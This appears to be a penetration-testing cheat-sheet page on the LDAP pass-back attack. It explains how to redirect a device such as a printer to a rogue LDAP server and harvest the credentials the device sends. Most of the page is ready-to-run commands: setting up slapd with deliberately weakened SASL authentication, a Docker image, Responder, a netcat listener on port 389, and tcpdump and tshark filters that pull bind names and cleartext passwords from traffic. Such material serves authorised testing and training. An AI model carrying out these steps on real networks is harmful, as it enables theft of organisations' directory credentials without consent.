LDAP Pass-back Attack
Requirements
Access to a host that can connect to the LDAP server (e.g., a printer).
The ability to modify the LDAP IP and trigger an LDAP connection session from the target (e.g., through the printer's web interface).
The ability to set up a malicious LDAP server with a weak authentication mechanism (e.g., using
nc, Docker, or Responder).
Setting Up a Rogue LDAP Server
1. Real LDAP Server
Install and configure the LDAP server:
sudo apt-get update && sudo apt-get -y install slapd ldap-utils
sudo systemctl enable slapd
sudo dpkg-reconfigure -p low slapdSet up a weak authentication mechanism:
Create a file olcSaslSecProps.ldif with the following content:
dn: cn=config
replace: olcSaslSecProps
olcSaslSecProps: noanonymous,minssf=0,passcredApply the configuration and restart the service:
sudo ldapmodify -Y EXTERNAL -H ldapi:// -f ./olcSaslSecProps.ldif
sudo service slapd restartVerify supported SASL mechanisms:
ldapsearch -H ldap:// -x -LLL -s base -b "" supportedSASLMechanisms2. Docker Setup
Use a pre-built Docker image for the rogue LDAP server:
git clone https://github.com/pedrojosenavasperez/ldap-passback-docker.git
cd ldap-passback-docker/
docker buildx build -t ldap-passback .
docker run --rm -ti -p 389:389 ldap-passback3. Responder
Use Responder to capture LDAP requests:
sudo responder -I <interface>4. Netcat
Set up a listener on port 389 using Netcat:
nc -lvp 389Gathering Credentials
You can use network analysis tools to extract credentials sent to the rogue LDAP server.
Using tcpdump:
tcpdump:Capture raw LDAP traffic on port 389:
sudo tcpdump -SX -i <interface> tcp port 389Using tshark:
tshark:Filter for LDAP credentials in captured traffic:
tshark -i any -f "port 389" -Y "ldap.protocolOp == 0 && ldap.simple" \
-e ldap.name -e ldap.simple -Tjson 2> /dev/nullReferences
Last updated